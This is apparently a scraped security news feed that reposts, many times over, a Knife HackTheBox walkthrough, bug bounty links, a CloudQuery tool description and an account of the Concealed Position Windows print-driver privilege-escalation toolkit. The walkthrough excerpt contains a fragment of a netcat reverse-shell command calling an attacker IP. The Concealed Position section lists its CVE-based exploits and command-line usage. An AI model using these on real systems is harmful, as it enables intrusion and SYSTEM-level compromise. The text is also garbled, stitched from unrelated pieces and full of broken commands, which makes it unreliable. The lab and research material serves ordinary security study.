Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking Articles|Raj Chandel's Blog
Knife HacktheBox Walkthrough
Today we are going to solve the lab name as Knife –Hack the Box. The purpose is to accept the challenge to root the machine. Usage of sudo rights and remote code execution to pwn the victim’s machine. Level: EasyNetwork ScanningKali:Attacker MachineVictim’s Machine:HTB Network ScanningRun the Nmap to know the open ports and services.EnumerationWithout losing hope we move forward with the web scanner tool name as “Nikto” to get the vulnerability if any.Run the below command and output reveals the retrieved x-powered by the header as PHP/8.1.0-devExploitation&1|nc 10.10.14.100 1234 >/tmp/fPrivilege EscalationAs shown in the above screenshot, user James may run with /usr/bin/knife as a root because he has the sudo privileges with no password.sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.___________________________
@hacking_Attack
@Hacking_Video
Knife HacktheBox Walkthrough
Today we are going to solve the lab name as Knife –Hack the Box. The purpose is to accept the challenge to root the machine. Usage of sudo rights and remote code execution to pwn the victim’s machine. Level: EasyNetwork ScanningKali:Attacker MachineVictim’s Machine:HTB Network ScanningRun the Nmap to know the open ports and services.EnumerationWithout losing hope we move forward with the web scanner tool name as “Nikto” to get the vulnerability if any.Run the below command and output reveals the retrieved x-powered by the header as PHP/8.1.0-devExploitation&1|nc 10.10.14.100 1234 >/tmp/fPrivilege EscalationAs shown in the above screenshot, user James may run with /usr/bin/knife as a root because he has the sudo privileges with no password.sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.___________________________
@hacking_Attack
@Hacking_Video
Blogspot
Knife HacktheBox Walkthrough
Hacking Articles is a very interesting blog about information security, penetration testing and vulnerability assessment managed by Raj Chandel.
Hacking Articles Tips Tricks Videos Tutorials
Hacking Articles|Raj Chandel's Blog Knife HacktheBox Walkthrough Today we are going to solve the lab name as Knife –Hack the Box. The purpose is to accept the challenge to root the machine. Usage of sudo rights and remote code execution to pwn the victim’s…
Polysynth Bug Bounty
https://medium.com/@polysynth/polysynth-bug-bounty-612e8e46e410?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@polysynth/polysynth-bug-bounty-612e8e46e410?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Polysynth Bug Bounty
Earn up to 500,000 POL Tokens for finding bugs
Earn up to 500,000 POL Tokens for finding bugsContinue reading on Medium » (https://medium.com/@polysynth/polysynth-bug-bounty-612e8e46e410?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Polysynth Bug Bounty
Earn up to 500,000 POL Tokens for finding bugs
Bypass of biometrics & password security functionality for Android
https://medium.com/@dheerajkmadhukar/bypass-of-biometrics-password-security-functionality-for-android-8e0174ac7cac?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@dheerajkmadhukar/bypass-of-biometrics-password-security-functionality-for-android-8e0174ac7cac?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Bypass of biometrics & password security functionality for Android
Reported : Sat, Feb 27, 8:52 PM — 2020
Reported Again : Mon, Nov 2, 2020, 3:12 AM
Req for an update : Sat, Nov 7, 2020, 10:02 AM
Another…
Reported Again : Mon, Nov 2, 2020, 3:12 AM
Req for an update : Sat, Nov 7, 2020, 10:02 AM
Another…
Reported : Sat, Feb 27, 8:52 PM — 2020
Reported Again : Mon, Nov 2, 2020, 3:12 AM
Req for an update : Sat, Nov 7, 2020, 10:02 AM
Another…Continue reading on Medium » (https://medium.com/@dheerajkmadhukar/bypass-of-biometrics-password-security-functionality-for-android-8e0174ac7cac?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
Reported Again : Mon, Nov 2, 2020, 3:12 AM
Req for an update : Sat, Nov 7, 2020, 10:02 AM
Another…Continue reading on Medium » (https://medium.com/@dheerajkmadhukar/bypass-of-biometrics-password-security-functionality-for-android-8e0174ac7cac?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
Medium
Bypass of biometrics & password security functionality for Android
Reported : Sat, Feb 27, 8:52 PM — 2020
Reported Again : Mon, Nov 2, 2020, 3:12 AM
Req for an update : Sat, Nov 7, 2020, 10:02 AM
Another…
Reported Again : Mon, Nov 2, 2020, 3:12 AM
Req for an update : Sat, Nov 7, 2020, 10:02 AM
Another…
Improper phone number validation to account takeover
https://sheshasai.medium.com/improper-phone-number-validation-to-account-takeover-f8b78b08ed05?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://sheshasai.medium.com/improper-phone-number-validation-to-account-takeover-f8b78b08ed05?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Improper phone number validation to account takeover
Hi Everyone!
Hi Everyone!Continue reading on Medium » (https://sheshasai.medium.com/improper-phone-number-validation-to-account-takeover-f8b78b08ed05?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Improper phone number validation to account takeover
Hi Everyone!
Improper phone number validation to account takeover
Hi Everyone!Continue reading on Medium »
Read more...
Hi Everyone!Continue reading on Medium »
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking Articles
Knife HacktheBox Walkthrough
Today we are going to solve the lab name as Knife –Hack the Box. The purpose is to accept the challenge to root the machine. Usage of sudo rights and remote code execution to pwn the victim’s machine. Level: Easy Table of Content Network Scanning Nmap Enumeration Nikto Exploitation RCE
The post Knife HacktheBox Walkthrough appeared first on Hacking Articles.
___________________________
@hacking_Attack
@Hacking_Video
Knife HacktheBox Walkthrough
Today we are going to solve the lab name as Knife –Hack the Box. The purpose is to accept the challenge to root the machine. Usage of sudo rights and remote code execution to pwn the victim’s machine. Level: Easy Table of Content Network Scanning Nmap Enumeration Nikto Exploitation RCE
The post Knife HacktheBox Walkthrough appeared first on Hacking Articles.
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles
Knife HacktheBox Walkthrough - Hacking Articles
Today we are going to solve the lab name as Knife –Hack the Box. The purpose is to accept the challenge to root the machine.
Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!
Cloudquery - Transforms Your Cloud Infrastructure Into SQL Database For Easy Monitoring, Governance And Security
http://2.bp.blogspot.com/-hXoJmQO6MBE/YUOwaGJcWzI/AAAAAAAAu8Y/dm7EJl3bdXkp3tLKc_xgCUwww5-2NTXEACK4BGAYYCw/w640-h128/cloudquery_1_logo-714769.png CloudQuery transforms your cloud infrastructure into queryable SQL for easy monitoring, governance and security. What is CloudQuery and why use it?CloudQuery pulls, normalize, expose and monitor your cloud infrastructure and SaaS apps as SQL database. This abstracts various scattered APIs enabling you to define security, governance, cost and compliance policies with SQL.
CloudQuery can be easily extended to more resources and SaaS providers (open an Issue).
CloudQuery comes with built-in policy packs such as: AWS CIS (more is coming!).
Think about CloudQuery as a compliance-as-code tool inspired by tools like osquery and terraform, cool right? Links* Homepage: https://cloudquery.io
* Releases: https://github.com/cloudquery/cloudquery/releases
* Documentation: https://docs.cloudquery.io
* Hub (Provider and schema docs): https://hub.cloudquery.io/ Supported providers (Actively expanding)Checkout https://hub.cloudquery.io
If you want us to add a new provider or resource please open an Issue.
See docs for developing new provider. Download & installYou can download the precompiled binary from releases, or using CLI:
azure gcp okta] # cloudquery init gcp azure # This will generate a config containing gcp and azure providers # cloudquery init --help # Show all possible auto generated configs and flags ">
Once your
postgresql with docker # docker run -p 5432:5432 -e POSTGRES_PASSWORD=pass -d postgres cloudquery fetch --dsn "postgres://postgres:pass@localhost:5432/postgres" # cloudquery fetch --help # Show all possible fetch flags ">
Using
List ec2[...]
___________________________
@hacking_Attack
@Hacking_Video
Cloudquery - Transforms Your Cloud Infrastructure Into SQL Database For Easy Monitoring, Governance And Security
http://2.bp.blogspot.com/-hXoJmQO6MBE/YUOwaGJcWzI/AAAAAAAAu8Y/dm7EJl3bdXkp3tLKc_xgCUwww5-2NTXEACK4BGAYYCw/w640-h128/cloudquery_1_logo-714769.png CloudQuery transforms your cloud infrastructure into queryable SQL for easy monitoring, governance and security. What is CloudQuery and why use it?CloudQuery pulls, normalize, expose and monitor your cloud infrastructure and SaaS apps as SQL database. This abstracts various scattered APIs enabling you to define security, governance, cost and compliance policies with SQL.
CloudQuery can be easily extended to more resources and SaaS providers (open an Issue).
CloudQuery comes with built-in policy packs such as: AWS CIS (more is coming!).
Think about CloudQuery as a compliance-as-code tool inspired by tools like osquery and terraform, cool right? Links* Homepage: https://cloudquery.io
* Releases: https://github.com/cloudquery/cloudquery/releases
* Documentation: https://docs.cloudquery.io
* Hub (Provider and schema docs): https://hub.cloudquery.io/ Supported providers (Actively expanding)Checkout https://hub.cloudquery.io
If you want us to add a new provider or resource please open an Issue.
See docs for developing new provider. Download & installYou can download the precompiled binary from releases, or using CLI:
export OS=Darwin # Possible values: Linux,Windows,Darwin
curl -L https://github.com/cloudquery/cloudquery/releases/latest/download/cloudquery_${OS}_x86_64 -o cloudquery
chmod a+x cloudquery
./cloudquery --help
# if you want to download a specific version and not latest use the following endpoint
export VERSION= # specifiy a version
curl -L https://github.com/cloudquery/cloudquery/releases/download/${VERSION}/cloudquery_${OS}_x86_64 -o cloudqueryHomebrew brew install cloudquery/tap/cloudquery
# After initial install you can upgrade the version via:
brew upgrade cloudqueryQuick StartRunningFirst generate a config.hclfile that will describe which resources you want cloudquery to pull, normalize and transform resources to the specified SQL database by running the following command:azure gcp okta] # cloudquery init gcp azure # This will generate a config containing gcp and azure providers # cloudquery init --help # Show all possible auto generated configs and flags ">
cloudquery init aws # choose one or more from: [aws azure gcp okta]
# cloudquery init gcp azure # This will generate a config containing gcp and azure providers
# cloudquery init --help # Show all possible auto generated configs and flagsOnce your
config.hclis generated run the following command to fetch the resources:postgresql with docker # docker run -p 5432:5432 -e POSTGRES_PASSWORD=pass -d postgres cloudquery fetch --dsn "postgres://postgres:pass@localhost:5432/postgres" # cloudquery fetch --help # Show all possible fetch flags ">
# you can spawn a local postgresql with docker
# docker run -p 5432:5432 -e POSTGRES_PASSWORD=pass -d postgres
cloudquery fetch --dsn "postgres://postgres:pass@localhost:5432/postgres"
# cloudquery fetch --help # Show all possible fetch flagsUsing
psql -h localhost -p 5432 -U postgres -d postgrespostgres=# \dt
List of relations
Schema | Name | Type | Owner
--------+-------------------------------------------------------------+-------+----------
public | aws_autoscaling_launch_configuration_block_device_mapping | table | postgres
public | aws_autoscaling_launch_configurations | table | postgresRun the following example queries from psqlshellList ec2[...]
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Cloudquery - Transforms Your Cloud Infrastructure Into SQL Database For Easy Monitoring, Governance And Security
Hacking Articles Tips Tricks Videos Tutorials
KitPloit - PenTest Tools! Cloudquery - Transforms Your Cloud Infrastructure Into SQL Database For Easy Monitoring, Governance And Security http://2.bp.blogspot.com/-hXoJmQO6MBE/YUOwaGJcWzI/AAAAAAAAu8Y/dm7EJl3bdXkp3tLKc_xgCUwww5-2NTXEACK4BGAYYCw/w640-h128…
_images
Currently, cloudquery support AWS CIS policy pack (it is under active development, so it doesn't cover the whole spec yet).
To run AWS CIS pack enter the following commands (make sure you fetched all the resources beforehand by the
CREATE VIEW my_custom_view AS ... queries: - name: "Find thing that violates policy" query: > SELECT account_id, arn FROM ... ">
The
Full Documentation, resources and SQL schema definitions are available here. Providers AuthenticationSee additional documentation for each provider at https://hub.cloudquery.io. Compile and run
___________________________
@hacking_Attack
@Hacking_Video
SELECT * FROM aws_ec2_images;Find all public facing AWS load balancers SELECT * FROM aws_elbv2_load_balancers WHERE scheme = 'internet-facing';Running policy packscloudquery comes with some ready compliance policy pack which you can use as is or modify to fit your use-case.Currently, cloudquery support AWS CIS policy pack (it is under active development, so it doesn't cover the whole spec yet).
To run AWS CIS pack enter the following commands (make sure you fetched all the resources beforehand by the
fetchcommand): ./cloudquery policy --path=You can also create your own policy file. E.g.:CREATE VIEW my_custom_view AS ... queries: - name: "Find thing that violates policy" query: > SELECT account_id, arn FROM ... ">
views:
- name: "my_custom_view"
query: >
CREATE VIEW my_custom_view AS ...
queries:
- name: "Find thing that violates policy"
query: >
SELECT account_id, arn FROM ...The
policycommand uses the policy file path ./policy.ymlby default, but this can be overridden via the --pathflag, or the CQ_POLICY_PATHenvironment variable.Full Documentation, resources and SQL schema definitions are available here. Providers AuthenticationSee additional documentation for each provider at https://hub.cloudquery.io. Compile and run
go build .
./cloudquery # --help to see all options Running on AWS (Lambda, Terraform)Checkout cloudquery/terraform-aws-cloudquery LicenseBy contributing to cloudquery you agree that your contributions will be licensed as defined on the LICENSE file. HiringIf you are into Go, Backend, Cloud, GCP, AWS - ping us at jobs [at] our domain ContributionFeel free to open Pull-Request for small fixes and changes. For bigger changes and new providers please open an issue first to prevent double work and discuss relevant stuff. Download Cloudquery___________________________
@hacking_Attack
@Hacking_Video
Dark Reading: Attacks/Breaches
Research Highlights Significant Evolution in Email Security
Email security is in transition, from on-premises to the cloud, from inline to API-based, and from stand-alone to integrated into XDR. New research from Omdia highlights where the market is today, and where it is heading.
___________________________
@hacking_Attack
@Hacking_Video
Research Highlights Significant Evolution in Email Security
Email security is in transition, from on-premises to the cloud, from inline to API-based, and from stand-alone to integrated into XDR. New research from Omdia highlights where the market is today, and where it is heading.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Research Highlights Significant Evolution in Email Security
Email security is in transition, from on-premises to the cloud, from inline to API-based, and from stand-alone to integrated into XDR. New research from Omdia highlights where the market is today, and where it is heading.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
Concealed Position : Bring Your Own Print Driver Privilege Escalation Tool
Concealed Position is a local privilege escalation attack against Windows using the concept of “Bring Your Own Vulnerability”. Specifically, Concealed Position (CP) uses the as designed package point and print logic in Windows that allows a low privilege user to stage and install printer drivers. CP specifically installs drivers with known vulnerabilities which are then exploited to escalate to SYSTEM. Concealed Position was first presented at DEF CON 29. What Exploits Are Available
Concealed Position offers four exploits – all with equally dumb names:
* ACIDDAMAGE – CVE-2021-35449 – Lexmark Universal Print Driver LPE
* RADIANTDAMAGE – CVE-2021-38085 – Canon TR150 Print Driver LPE
* POISONDAMAGE – CVE-2019-19363 – Ricoh PCL6 Print Driver LPE
* SLASHINGDAMAGE – CVE-2020-1300 – Windows Print Spooler LPE
The exploits are neat because, besides SLASHINGDAMAGE, they will continue working even after the issues are patched. The only mechanism Windows has to stop users from using old drivers is to revoke the driver’s certificate – something that is not(?) historically done. But Which Exploit Should I Use?!
Probably ACIDDAMAGE. RADIANTDAMAGE and POISONDAMAGE are race conditions (to overwrite a DLL) and SLASHINGDAMAGE damage, hopefully, is patched most everywhere. How Does It Work?
Concealed Position has two parts. An evil printer and a client. The client reaches out to the server, grabs a driver, gets the driver stored in the driver store, installs the printer, and exploits the install process. Easy! In MSAPI speak, the attack goes something like this:
Step 1: Stage the driver in the driver store
client to server: GetPrinterDriver
server to client: Response with driver
Stage 2: Install the driver from the driver store
client: InstallPrinterDriverFromPackage
Stage 3: Add a local printer (exploitation stage)
client: Add printer
It is important to note that SLASHINGDAMAGE doesn’t actually work like that though. SLASHINGDAMAGE is an implementation of the evil printer attack described at DEFCON 28 (2020) and has long since been patched. I just so happen to enjoy the attack (it sparked the rest of this development) and figured I’d leave the exploit in my evil server… as confusing as that may be. Is This A Windows Vulnerability?
Arguably, yes. The driver store is a “trusted collection of … third-party driver packages” that requires administrator access to modify. Using
Microsoft seemed to agree when they issued CVE-2021-34481.
Although… it’s arguable that this is simply a feature of the system and not a vulnerability at all. It really doesn’t matter all that much. An attacker can escalate to SYSTEM on standard Windows installs. Which Verions Of Windows Are Affected By CVE-2021-34481?
At least Windows 8.1 and above. How Do I Use These Tools?
Simple! So simple there will be many paragraphs to describe it! CP Server
First, let’s look at cp_server’s command line options:
C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_server.exe
_
| || || | | || || || _ || | | || |
| || _ || || || || || || || | | || _ | | || | | || || || | | || | | |_ | | | | | || || || _ || || || || | | || || | | |_ | || | | || |_ | | | _ || || | | | |||||| |||||||| ||||||||
_ _
| || || || | | || | | || | | |
| _ || _ || || | |_ || | | || || | | || || | | || | | | | | | | | | | || |
| || || || || | | | | | | || || _ |
| | | | | || | | | | | | || | | |
|| |||||| || || |_||| || server!
CLI options:
-h, –help Display the help message
-e, –exploit arg The exploit to use
-c, –cabs arg (=.\cab_files) The location of the cabinet files
Exploits available:
ACIDDAMAGE
POISONDAMAGE[...]
___________________________
@hacking_Attack
@Hacking_Video
Concealed Position : Bring Your Own Print Driver Privilege Escalation Tool
Concealed Position is a local privilege escalation attack against Windows using the concept of “Bring Your Own Vulnerability”. Specifically, Concealed Position (CP) uses the as designed package point and print logic in Windows that allows a low privilege user to stage and install printer drivers. CP specifically installs drivers with known vulnerabilities which are then exploited to escalate to SYSTEM. Concealed Position was first presented at DEF CON 29. What Exploits Are Available
Concealed Position offers four exploits – all with equally dumb names:
* ACIDDAMAGE – CVE-2021-35449 – Lexmark Universal Print Driver LPE
* RADIANTDAMAGE – CVE-2021-38085 – Canon TR150 Print Driver LPE
* POISONDAMAGE – CVE-2019-19363 – Ricoh PCL6 Print Driver LPE
* SLASHINGDAMAGE – CVE-2020-1300 – Windows Print Spooler LPE
The exploits are neat because, besides SLASHINGDAMAGE, they will continue working even after the issues are patched. The only mechanism Windows has to stop users from using old drivers is to revoke the driver’s certificate – something that is not(?) historically done. But Which Exploit Should I Use?!
Probably ACIDDAMAGE. RADIANTDAMAGE and POISONDAMAGE are race conditions (to overwrite a DLL) and SLASHINGDAMAGE damage, hopefully, is patched most everywhere. How Does It Work?
Concealed Position has two parts. An evil printer and a client. The client reaches out to the server, grabs a driver, gets the driver stored in the driver store, installs the printer, and exploits the install process. Easy! In MSAPI speak, the attack goes something like this:
Step 1: Stage the driver in the driver store
client to server: GetPrinterDriver
server to client: Response with driver
Stage 2: Install the driver from the driver store
client: InstallPrinterDriverFromPackage
Stage 3: Add a local printer (exploitation stage)
client: Add printer
It is important to note that SLASHINGDAMAGE doesn’t actually work like that though. SLASHINGDAMAGE is an implementation of the evil printer attack described at DEFCON 28 (2020) and has long since been patched. I just so happen to enjoy the attack (it sparked the rest of this development) and figured I’d leave the exploit in my evil server… as confusing as that may be. Is This A Windows Vulnerability?
Arguably, yes. The driver store is a “trusted collection of … third-party driver packages” that requires administrator access to modify. Using
GetPrinterDrivera low privileged attacker can stage arbitrary drivers into the store. This, to me, crosses a clear security boundary.Microsoft seemed to agree when they issued CVE-2021-34481.
Although… it’s arguable that this is simply a feature of the system and not a vulnerability at all. It really doesn’t matter all that much. An attacker can escalate to SYSTEM on standard Windows installs. Which Verions Of Windows Are Affected By CVE-2021-34481?
At least Windows 8.1 and above. How Do I Use These Tools?
Simple! So simple there will be many paragraphs to describe it! CP Server
First, let’s look at cp_server’s command line options:
C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_server.exe
_
| || || | | || || || _ || | | || |
| || _ || || || || || || || | | || _ | | || | | || || || | | || | | |_ | | | | | || || || _ || || || || | | || || | | |_ | || | | || |_ | | | _ || || | | | |||||| |||||||| ||||||||
_ _
| || || || | | || | | || | | |
| _ || _ || || | |_ || | | || || | | || || | | || | | | | | | | | | | || |
| || || || || | | | | | | || || _ |
| | | | | || | | | | | | || | | |
|| |||||| || || |_||| || server!
CLI options:
-h, –help Display the help message
-e, –exploit arg The exploit to use
-c, –cabs arg (=.\cab_files) The location of the cabinet files
Exploits available:
ACIDDAMAGE
POISONDAMAGE[...]
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux Tutorials
Concealed Position : Bring Your Own Print Driver Privilege Escalation Tool
Concealed Position is a local privilege escalation attack against Windows using the concept of "Bring Your Own Vulnerability".